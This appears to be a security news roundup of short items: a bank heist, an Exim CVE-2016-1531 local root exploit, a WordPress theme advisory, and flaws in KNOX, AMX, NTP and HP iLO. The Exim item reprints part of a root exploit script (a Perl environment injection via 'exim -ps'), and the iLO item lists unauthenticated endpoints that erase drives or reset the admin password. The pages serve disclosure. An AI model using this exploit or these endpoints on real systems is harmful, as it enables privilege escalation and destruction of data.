Hacks and Incidents

Hackers tried and failed to steal a billion dollars from bank

Hackers tried and failed to steal a billion dollars from bank: Hackers stole $80 million from a bank, but it could have been a lot worse if they had just Googled the name of a company, according to Reuters. Thieves got inside servers of the Bangladesh Bank, stealing the credentials used to make online transfers. They then bombarded the Federal Reserve Bank in New York with up to 13 money transfer requests to organizations in the Philippines and Sri Lanka. The Fed allowed four to go through totaling $81 million, but the next one was flagged by a routing bank in Germany because the hackers misspelled “foundation” as “fandation.”

Hacks and Incidents

Exim 4.84-3 Local Root / Privilege Escalation

Time to patch your Exim against local attackers as 4.84-3 and below are affected by a pretty simple vulnerability: the SUID exim binar, when invoked with the “perl_startup” flag, uses environment variables in an unsafe way. As result an attacker can execute arbitrary Perl code as root.

# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Read more on https://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.html and http://exim.org/static/doc/CVE-2016-1531.txt.

Hacks and Incidents

Elegant Themes Divi builder and Plugin Options vulnerabilities

Some WordPress themes from ElegantThemes (http://www.elegantthemes.com) are vulnerable to user privilege escalation.

Below the complete advisory information:

Today our divi builder and plugin options frameworks were updated to fix a security vulnerability. The vulnerability affects several of our themes and plugins, including our Divi (http://www.elegantthemes.com/gallery/divi/) , Extra (http://www.elegantthemes.com/gallery/extra/) , and Divi 2.3 (legacy) themes, as well as our Divi Builder (http://www.elegantthemes.com/plugins/divi-builder/) , Bloom (http://www.elegantthemes.com/plugins/bloom/) and Monarch (http://www.elegantthemes.com/plugins/monarch/) plugins.

Updating these themes and plugins to their latest versions will patch this vulnerability, keeping your websites safe. These are critical updates.

There have been no reports of exploit attempts against this vulnerability. The vulnerability was privately disclosed to our team and we worked closely with the researcher, our team and a third-party security vendor to identify and patch the vulnerability quickly.

The Security Vulnerability

An information disclosure vulnerability was found in the Divi Builder (included in our Divi and Extra themes, as well as our Divi Builder plugin) which resulted in the potential for user privilege escalation. If properly exploited, it could allow registered users, regardless of role, on your WordPress installation to perform a subset of actions within the Divi Builder, including the ability to manipulate posts.

A similar flaw was found in Bloom and Monarch, creating the potential for registered WordPress users to manipulate plugin settings.

If you are using any of the products listed above and you have untrusted authors, plugins that allow user registration or you have enabled open user registration, you are at risk from this vulnerability.

How To Fix It

Updating your themes and plugins will fix this problem.

You can update your theme (http://www.elegantthemes.com/gallery/divi/documentation/update/) or update your plugin (http://www.elegantthemes.com/plugins/divi-builder/documentation/update/) using our elegant updater plugin, or you can download the latest versions from the members area (https://www.elegantthemes.com/members-area/) and update them manually (https://www.elegantthemes.com/members-area/documentation.html#updater) . We have also created an upgrade path for our legacy Divi 2.3 theme. If you have been using this legacy version and do not wish to upgrade fully, you will notice an update notification for version 2.3.4 is now available. You can also download version 2.3.4 from the members area. This will patch the vulnerability without adding new features.

The following product versions are patched and secured:

  • Divi 2.6.4
  • Divi (legacy) 2.3.4
  • Divi Builder 1.2.4
  • Extra 1.2.4
  • Bloom 1.1.1
  • Monarch 1.2.7

Has Your Account Expired?

We are making these updates available for free to all expired accounts. We want as many people as possible to have easy access to this patch. Even if your account has expired, you can still use our updater plugin to update to this particular theme/plugin version. Expired accounts will not be restricted from updating. You can also contact us to have the latest versions sent to you if you have forgotten your username and API key. Simply reply to this email.

What If You Can’t Update Right Now?

It’s not recommended that you continue to use affected versions. If you are unable to update your themes/plugins right away, we’ve compiled a list of actions you can take to lessen the potential exposure:

* Install The Security Patcher: We created a plugin that will patch the issue without upgrading your versions. This is a free download (https://www.elegantthemes.com/members-area/security/) for all customers. This is ideal for anyone that is unable to upgrade for whatever reason. Installing this plugin along with out-dated versions of our themes & plugins will patch known vulnerabilities in our products to the best of its ability.

* Disable User Registration: It’s suggested that you delete any untrusted registered users from your WordPress installation, disable plugins that allow for user registration and make sure that you have not enabled the anyone can register setting (https://codex.wordpress.org/Settings_General_Screen) in your WordPress Dashboard. This vulnerability only applies to WordPress websites that have untrusted registered users, so disallowing user registration will effectively remove the potential for user privilege escalation.

* Web Application Firewalls: We have coordinated with Sucuri’s CloudProxy (https://sucuri.net/website-firewall/) team and they have virtually patched the vulnerability within their network. Utilizing the CloudProxy WAF will help specifically target and protect some aspects of this vulnerability.

The above steps are not necessary if you have upgraded your themes and plugins. Upgrading should be considered the only true fix, but we understand that in some circumstances this may prove difficult. In those cases, the recommendations above are most effective.

Security is Very Important to Us

I can personally assure you that security is paramount here at Elegant Themes. We take a number of precautions to help mitigate issues like this. Some of those precautions include internal peer reviews and occasional third-party independent reviews, including static / dynamic code analysis and human line-by-line code audits. Regardless, in this instance, something slipped through the process and we’re working hard to identify how, but more importantly how to avoid it in the future.

While our team worked to fix these vulnerabilities, we also contacted Sucuri, a leading WordPress security research team, to perform a new and complete security audit of Divi and the included divi builder framework. We followed this up with a full internal re-review of all affected products.

I can not begin to express my apologies for the inconvenience this may present to our customers. We are extremely disappointed that this occurred, and will continue to work towards providing you the exemplary products you have come to expect. As a member of Elegant Themes, you can be sure that we will always be here to help keep you and your client’s websites safe. As a final reminder, please remember to always keep your themes and plugins updated. In this case, a timely upgrade is all that’s needed to secure your websites.

If you have any questions or concerns, please know that our virtual doors are always open. If there is anything we can do to help, just let us know.

Best Wishes,
Nick Roach


Hacks and Incidents

Samsung KNOX 1.0 Weak eCryptFS Key Generation

Samsung KNOX 1.0 Weak eCryptFS Key Generation ≈ Packet Storm: The vulnerability allows disclosure of Data-at-Rest of Samsung KNOX 1.0 containers.

KNOX container data is encrypted using eCryptFS containers. The same form of encryption is applied to both container application data and sdcard content.

To provide eCryptFS the required a 32-byte AES key, KNOX produces a combination of the user’s password (minimum 7 chars) and 32 random bytes (denoted as the TIMA key).

The TIMA key is generated during the first container creation and stored aside for later use in creating the eCryptFS key.

The vulnerability itself is in the generation of the eCryptFS-key from the password and the TIMA key.

Hacks and Incidents

Deliberately hidden backdoor account in several AMX (HARMAN Professional) devices

SEC Consult: Deliberately hidden backdoor account in several AMX (HARMAN Professional) devices: A function, which they decided to call “setUpSubtleUserAccount”. And this function does exactly what the name would suggest.
It sets up a subtle user account. The strings seen in the above screenshot, revealed an interesting detail about the vendor’s security strategy.

Hacks and Incidents

NTP Stats Directory Cleanup Cronjob Root Privilege Escalation

NTP Stats Directory Cleanup Cronjob Root Privilege Escalation: The cronjob script bundled with ntp package is intended to perform cleanup on statistics files produced by NTP daemon running with statistics enabled. The script is run as root during the daily cronjobs all operations on the ntp-user controlled statistics directory without switching to user ntp. Thus all steps are performed with root permissions in place.Due to multiple bugs in the script, a malicious ntp user can make the backup process to overwrite arbitrary files with content controlled by the attacker, thus gaining root privileges.

Hacks and Incidents

Breach at IT Automation Firm LANDESK

Breach at IT Automation Firm LANDESK: LANDESK, a company that sells software to help organizations securely and remotely manage their fleets of desktop computers, servers and mobile devices, alerted employees last week that a data breach may have exposed their personal information. But LANDESK employees contacted by this author say the breach may go far deeper for the company and its customers.

Hacks and Incidents

Yet another attack against the iKettle wireless kettle. Rumpy pumpy and fire alarms?

Yet another attack against the iKettle wireless kettle. Rumpy pumpy and fire alarms?: Whilst playing around with moosekettle.py, the python client from @iamamoose for driving ones kettle from a desktop, it struck me that there’s a related attack against unconfigured iKettles.

When turned on, before configuring with the mobile app, it runs in Access Point mode and presents the default SSID of ‘iKettle’. Perfect for easy identification when war driving!

Once configured, it flips to being a client on the network. One can tell simply by the SSID whether it’s been configured, or whether someone has plugged it in and not got round to hooking it up to the mobile app yet.

Hacks and Incidents

Remote Command Execution in Proliant iLO Intelligent Provisioning

Remote Command Execution in Proliant iLO Intelligent Provisioning: iLO is an embedded operating system available within HP Proliant and Integrity servers. IP is a feature within iLO that provides local and remote access for provisioning purposes. It was discovered that hidden requests were being made to server during a normal client session. Exploring this obfuscated functionality revealed the ability to execute arbitrary commands as root on the system.

Vulnerable Versions

Integrated Lights-Out 4 (latest firmware v2.00) with Intelligence Provisioning v1.60


Administrators can use the Remote Console from the iLO web interface to initiate Intelligent Provisioning. Working in this mode is common for new deployments as it provides many facilities for configuration, diagnostics and most importantly system updates. There are Apache webservers listening on both ports 80 and 2381. There is also an Nginx server listening on port 5008. There is no authentication to access the content at any of these portals; the system replies upon obfuscation techniques to mask implementation from the frontend. For example, if you remotely hit /hpdiags/frontend2/startup.php on port 2381, you can access the server’s diagnostic page. Or /confirmerase.htm on port 5008, you can erase “All Hard Drives”, RBSU and logs. /locfg.htm allows you to change the Administrator password.